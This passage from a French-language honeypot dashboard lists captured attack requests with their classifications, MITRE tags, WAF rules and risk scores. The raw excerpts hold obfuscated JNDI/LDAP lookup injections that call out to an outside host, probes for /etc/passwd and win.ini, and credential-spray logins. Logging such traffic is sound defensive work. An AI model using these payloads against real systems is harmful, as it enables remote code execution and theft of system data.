GET /${${s6q7:2c:3e1m:-j}${kx:-n}${u3:j14:b:-d}${wb5i:v:-i}${u:z:-:}${6dr:bmf1:-l}${0:-d}${d5p:zwm:-a}${q7oj:pde:-p}${v:mn9:-:}${hg80:9stl:-/}${8e5g:ja:it:-/}${oer:-P}${z:-A}${ldc7:ix:-l}${0ky:2xt:asj4:-0}${2zmw:g79:tl:-c}${y:3q:--}${${nk1:-s}${n:v:-y}${yn
|
|||||||
| TCP | 2083 · HTTP | http | deser php attack deser php attack · via HTTP:2083 · (tentative d'exploit) · → /${${60u:lt:-j}${z:-n}${2:hxul:3:-d}${f:9:-i}${… | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /${${60u:lt:-j}${z:-n}${2:hxul:3:-d}${f:9:-i}${i158:q589:v9w3:-:}${70j:y0k:k4:-l}${li6:iqa:-d}${e:u… UA ${${lzgn:fe4:3:-j}${9386:4w8:0c:-n}${ai90:a04:-d}${ye:-i}${vql:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${60u:lt:-j}${z:-n}${2:hxul:3:-d}${f:9:-i}${i158:q589:v9w3:-:}${70j:y0k:k4:-l}${li6:iqa:-d}${e:u2d:-a}${eo:hc:aefn:-p}${534:kox:-:}${tvb:oi:-/}${o:-/}${su6:v3t:-P}${9:-A}${0sk:25:-l}${q8:0:-0}${4b6:b8:-c}${2pv:x87e:--}${${ajm:wfa:-s}${g0k:-y}${5k:bg51:kdjz:-s}${l:-:}${3:18h:-j}${jy:tqe6:-a}${9pqa:scqg:rpng:-v}${8qlt:-a}${4mkc:-.}${7so:ganw:wase:-v}${rcty:-e}${i0kq:-r}${fdo:6:7d:-s}${g9:2il:n:-i}${kh:ef:a:-o}${f:-n}}${os8:-.}${0f:li1:-e}${u:yp:253d:-a}${kg:-5}${tev:68:ypm:-5}${1d7:-5}${8:960:ud:-0}${lfkh:
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
2083
Chemin / cible
/${${60u:lt:-j}${z:-n}${2:hxul:3:-d}${f:9:-i}${i158:q589:v9w3:-:}${70j:y0k:k4:-l}${li6:iqa:-d}${e:u2d:-a}${eo:hc:aefn:-p}${534:kox:-:}${tvb:oi:-/}${o:-/}${su6:…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 67
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
${${lzgn:fe4:3:-j}${9386:4w8:0c:-n}${ai90:a04:-d}${ye:-i}${vql:-:}${e1:h:-l}${98:-d}${xmei:5:-a}${i91:-p}${ohn:1w:-:}${79:h5q:mkp6:-/}${d9:2:wgu:-/}${06p:-U}${2:-A}${z:c:48:-l}${js:-0}${28c:-c}${z:1h…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${60u:lt:-j}${z:-n}${2:hxul:3:-d}${f:9:-i}${i158:q589:v9w3:-:}${70j:y0k:k4:-l}${li6:iqa:-d}${e:u2d:-a}${eo:hc:aefn:-p}${5
Requête brute (extrait)
GET /${${60u:lt:-j}${z:-n}${2:hxul:3:-d}${f:9:-i}${i158:q589:v9w3:-:}${70j:y0k:k4:-l}${li6:iqa:-d}${e:u2d:-a}${eo:hc:aefn:-p}${534:kox:-:}${tvb:oi:-/}${o:-/}${su6:v3t:-P}${9:-A}${0sk:25:-l}${q8:0:-0}${4b6:b8:-c}${2pv:x87e:--}${${ajm:wfa:-s}${g0k:-y}${5k:bg
|
|||||||
| TCP | 2083 · HTTP | http | Sonde port 2083/TCP port 2083 tcp · via HTTP:2083 · (sonde / probe) | Élevée | Moyen · 46 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
2083
Chemin / cible
/
Preuve honeypot — Sonde port 2083/TCP
Connexion détectée sur le port 2083 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_2083_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 46
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${do:-j}${qpm:-n}${wir:g59i:t5mi:-d}${vh:v:gay:-i}${sf
|
|||||||
| TCP | 2083 · HTTP | http | Sonde port 2083/TCP port 2083 tcp · via HTTP:2083 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${3g:-j}${6q5j:f3s4:-n}${k7:-d}${8to:-i}${48:ane:13jz:-:}${5h…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
2083
Chemin / cible
/
Preuve honeypot — Sonde port 2083/TCP
Connexion détectée sur le port 2083 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_2083_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${3g:-j}${6q5j:f3s4:-n}${k7:-d}${8to:-i}${48:ane:13jz:-:}${5hb:-l}${frhy:-d}${jgm1:-a}${ir:yb3j:ncq:-p}${i:-:}${nl6:-/}${4ts:u5t:-/}${3i:y:-U}${dy:-A}${60uf:tv6:m380:-l}${xrk:nds:gjl1:-0}${9oxt:nrh…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: 62.3.50.33:2083
Accept: */*
User-Agent: ${${3g:-j}${6q5j:f3s4:-n}${k7:-d}${8to:-i}${48:ane:13jz:-:}${5h
Requête brute (extrait)
POST / HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: ${${3g:-j}${6q5j:f3s4:-n}${k7:-d}${8to:-i}${48:ane:13jz:-:}${5hb:-l}${frhy:-d}${jgm1:-a}${ir:yb3j:ncq:-p}${i:-:}${nl6:-/}${4ts:u5t:-/}${3i:y:-U}${dy:-A}${60uf:tv6:m380:-l}${xrk:nds:gjl1:-0}${
|
|||||||
| TCP | 2083 · HTTP | http | Sonde port 2083/TCP port 2083 tcp · via HTTP:2083 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${0u1:f:-j}${esov:stqm:0l:-n}${z5k:qv6t:03:-d}${vs:c:f:-i}${6…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
2083
Chemin / cible
/
Preuve honeypot — Sonde port 2083/TCP
Connexion détectée sur le port 2083 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_2083_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${0u1:f:-j}${esov:stqm:0l:-n}${z5k:qv6t:03:-d}${vs:c:f:-i}${6h:-:}${mol:-l}${k3e:-d}${c:6ru5:6:-a}${4er:-p}${ae9:xs9:-:}${p:-/}${f:-/}${6h:v:-U}${o6:-A}${36o:-l}${al:-0}${jh:zn5:fn:-c}${zj:091e:--}…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: 62.3.50.33:2083
Accept: */*
User-Agent: ${${0u1:f:-j}${esov:stqm:0l:-n}${z5k:qv6t:03:-d}${vs:c:f:-i}${6h
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2083 Accept: */* User-Agent: ${${0u1:f:-j}${esov:stqm:0l:-n}${z5k:qv6t:03:-d}${vs:c:f:-i}${6h:-:}${mol:-l}${k3e:-d}${c:6ru5:6:-a}${4er:-p}${ae9:xs9:-:}${p:-/}${f:-/}${6h:v:-U}${o6:-A}${36o:-l}${al:-0}${jh:zn5:fn:-c}${zj:0
|
|||||||
| TCP | 3128 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:3128 · (tentative d'exploit) · → /etc/passwd | Élevée | Élevé · 71 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /etc/passwd UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3128
Chemin / cible
/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
pat-0716
pat-0802
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
MITRE T1083 file enum
SSRF Any-address SSRF
LFI path /etc/passwd
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh;
Requête brute (extrait)
GET /etc/passwd HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 3000 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:3000 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Content-Length: 1606 {"username"
|
|||||||
| TCP | 3128 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:3128 · (tentative d'exploit) · → /Windows/win.ini | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /Windows/win.ini UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
27
Recommandation
Investiguer
Tags
Cible HTTP
GET
/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3128
Chemin / cible
/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0715
CRS-930100-sub
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macin
Requête brute (extrait)
GET /Windows/win.ini HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 3000 · HTTP | http | Sonde port 3000/TCP port 3000 tcp · via HTTP:3000 · (sonde / probe) · → /${${og:-j}${vy:i9:e8t:-n}${ma67:iate:-d}${y:3x… | Élevée | Moyen · 62 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
PUT /${${og:-j}${vy:i9:e8t:-n}${ma67:iate:-d}${y:3x:-i}${z97:bkzf:xi:-:}${a98p:-l}${uie:r:-d}${nk:njmr:… UA ${${sa:x:-j}${em:7:gql3:-n}${j:iw86:0gwn:-d}${e:-i}${es:t4y:xs:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${og:-j}${vy:i9:e8t:-n}${ma67:iate:-d}${y:3x:-i}${z97:bkzf:xi:-:}${a98p:-l}${uie:r:-d}${nk:njmr:y:-a}${vpe5:5ad:-p}${0:p:mls:-:}${7vfx:e7in:m9:-/}${zei:0wc:3ql:-/}${mk3:k4:-P}${sq:0v:-A}${xz3:zu:-l}${p1g:-0}${21:-c}${jtz:a:--}${${1di:-s}${na:5:ud:-y}${as:-s}${k2x:2nw9:-:}${vzt:-j}${2ulr:fwl:-a}${a:-v}${v:-a}${r2ix:xj:ksq1:-.}${mi:-v}${2kx:kyl:iv:-e}${tz:-r}${6:59:i0:-s}${1w:yz:-i}${ro8l:ea:-o}${5:7u:ry:-n}}${9sqz:36ih:-.}${dx3:m:a:-1}${3o:-b}${1g:-0}${9oj:lz:edz:-d}${kbd5:gmy1:-c}${ab:bdij:4ahe:-e}${at:s
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
3000
Chemin / cible
/${${og:-j}${vy:i9:e8t:-n}${ma67:iate:-d}${y:3x:-i}${z97:bkzf:xi:-:}${a98p:-l}${uie:r:-d}${nk:njmr:y:-a}${vpe5:5ad:-p}${0:p:mls:-:}${7vfx:e7in:m9:-/}${zei:0wc:…
Preuve honeypot — Sonde port 3000/TCP
Connexion détectée sur le port 3000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_3000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 62
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${sa:x:-j}${em:7:gql3:-n}${j:iw86:0gwn:-d}${e:-i}${es:t4y:xs:-:}${e:2:rc:-l}${6:-d}${ja:-a}${3s9:8:mnvu:-p}${s2y:-:}${y:j65:a:-/}${lwu:s:-/}${z8v:1:-U}${6:-A}${va:s7:-l}${w:-0}${sgb1:3w:6h0w:-c}${p…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${og:-j}${vy:i9:e8t:-n}${ma67:iate:-d}${y:3x:-i}${z97:bkzf:xi:-:}${a98p:-l}${uie:r:-d}${nk:njmr:y:-a}${vpe5:5ad:-p}${0:p:
Requête brute (extrait)
PUT /${${og:-j}${vy:i9:e8t:-n}${ma67:iate:-d}${y:3x:-i}${z97:bkzf:xi:-:}${a98p:-l}${uie:r:-d}${nk:njmr:y:-a}${vpe5:5ad:-p}${0:p:mls:-:}${7vfx:e7in:m9:-/}${zei:0wc:3ql:-/}${mk3:k4:-P}${sq:0v:-A}${xz3:zu:-l}${p1g:-0}${21:-c}${jtz:a:--}${${1di:-s}${na:5:ud:-y
|
|||||||
| TCP | 3000 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:3000 · (sonde / probe) · → /login | Élevée | Élevé · 70 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
3000
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKi
Requête brute (extrait)
POST /login HTTP/1.1 Host: 62.3.50.33:3000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2893 Content-Type: application/x-www-form-urlencod |
|||||||
| TCP | 3128 · HTTP | http | SSRF interne ssrf internal · via HTTP:3128 · (tentative d'exploit) | Élevée | Moyen · 56 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3128
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 56
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:3128 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 3000 · NODE HTTP | node-http | Injection PHP php injection · via NODE HTTP:3000 · (tentative d'exploit) | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
NODE-HTTP
WAF
—
Recommandation
Investiguer
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
3000
Chemin / cible
—
Service
NODE HTTP
Payload
ZSDLKFJ2 /${${rh:-j}${m:t3:y:-n}${urb:-d}${twm:ts:-i}${m:-:}${wk9c:gv:h3:-l}${k:xbd0:-d}${6:b75h:7:-a}${n5:q:f49:-p}${a:7:-:}${w
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${rh:-j}${m:t3:y:-n}${urb:-d}${twm:ts:-i}${m:-:}${wk9c:gv:h3:-l}${k:xbd0:-d}${6:b75h:7:-a}${n5:q:f49:-p}${a:7:-:}${w
Requête brute (extrait)
ZSDLKFJ2 /${${rh:-j}${m:t3:y:-n}${urb:-d}${twm:ts:-i}${m:-:}${wk9c:gv:h3:-l}${k:xbd0:-d}${6:b75h:7:-a}${n5:q:f49:-p}${a:7:-:}${wt6y:zr1:bj:-/}${px:-/}${b5y:-P}${t5x:3dx:bne:-A}${c:-l}${2r:oc1:hy72:-0}${qj:hv3:-c}${4j08:a2:--}${${g7d:j:-s}${1:zfh:29a:-y}${w
|
|||||||
| TCP | 3000 · HTTP | http | Sonde port 3000/TCP port 3000 tcp · via HTTP:3000 · (sonde / probe) · → /${${xnc:-j}${lum:-n}${f94:bm:edjz:-d}${kabi:s:… | Élevée | Moyen · 60 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${xnc:-j}${lum:-n}${f94:bm:edjz:-d}${kabi:s:-i}${xbfa:-:}${q:utzv:-l}${nzx:1wdp:7fy:-d}${p:oml:-… UA ${${g37:gu:-j}${v7a:-n}${k359:-d}${fge:rm39:-i}${rp24:xg:-:}${w…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${xnc:-j}${lum:-n}${f94:bm:edjz:-d}${kabi:s:-i}${xbfa:-:}${q:utzv:-l}${nzx:1wdp:7fy:-d}${p:oml:-a}${1ze:-p}${awqy:j8l:-:}${7nv:0uo:he:-/}${y4rf:-/}${r:-P}${sacj:-A}${hg:-l}${x6:eo6s:i1w8:-0}${kcw:vdma:6e8:-c}${lz:fyk:l:--}${${p:-s}${vn2:-y}${tu8v:81n:i1:-s}${clq:0jnt:-:}${vh:b28j:eadq:-j}${h0o:-a}${t5k:ztb:p3fb:-v}${ihs:zmy:-a}${x:6w:-.}${x:oj0:-v}${72v:ef:37vk:-e}${l:-r}${nc:gd:wr8:-s}${d5:x0rc:unj0:-i}${m:-o}${y7l:-n}}${y:b:-.}${8uod:x25:-1}${9:c:gus:-b}${2:15r4:05hy:-0}${t3q:x:-d}${v0w:9yrm:x:-c}${u9:
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
3000
Chemin / cible
/${${xnc:-j}${lum:-n}${f94:bm:edjz:-d}${kabi:s:-i}${xbfa:-:}${q:utzv:-l}${nzx:1wdp:7fy:-d}${p:oml:-a}${1ze:-p}${awqy:j8l:-:}${7nv:0uo:he:-/}${y4rf:-/}${r:-P}${…
Preuve honeypot — Sonde port 3000/TCP
Connexion détectée sur le port 3000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_3000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 60
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${g37:gu:-j}${v7a:-n}${k359:-d}${fge:rm39:-i}${rp24:xg:-:}${wd:j:-l}${nqd:-d}${d4mc:61q:f:-a}${xb:qic:-p}${q58c:wxs6:uv8:-:}${q:-/}${rj6:-/}${osb8:n:au:-U}${98fx:zme:-A}${xj:-l}${gfui:i:-0}${w:-c}$…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${xnc:-j}${lum:-n}${f94:bm:edjz:-d}${kabi:s:-i}${xbfa:-:}${q:utzv:-l}${nzx:1wdp:7fy:-d}${p:oml:-a}${1ze:-p}${awqy:j8l:-:}
Requête brute (extrait)
GET /${${xnc:-j}${lum:-n}${f94:bm:edjz:-d}${kabi:s:-i}${xbfa:-:}${q:utzv:-l}${nzx:1wdp:7fy:-d}${p:oml:-a}${1ze:-p}${awqy:j8l:-:}${7nv:0uo:he:-/}${y4rf:-/}${r:-P}${sacj:-A}${hg:-l}${x6:eo6s:i1w8:-0}${kcw:vdma:6e8:-c}${lz:fyk:l:--}${${p:-s}${vn2:-y}${tu8v:81
|
|||||||
| TCP | 3000 · HTTP | http | deser php attack deser php attack · via HTTP:3000 · (tentative d'exploit) · → /${${6q:j:gz:-j}${9nd0:belk:wt:-n}${0s:-d}${q1b… | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /${${6q:j:gz:-j}${9nd0:belk:wt:-n}${0s:-d}${q1b:hc:45x:-i}${jnd:wb:-:}${d:-l}${o4:a:-d}${9fs:0zb:rb… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
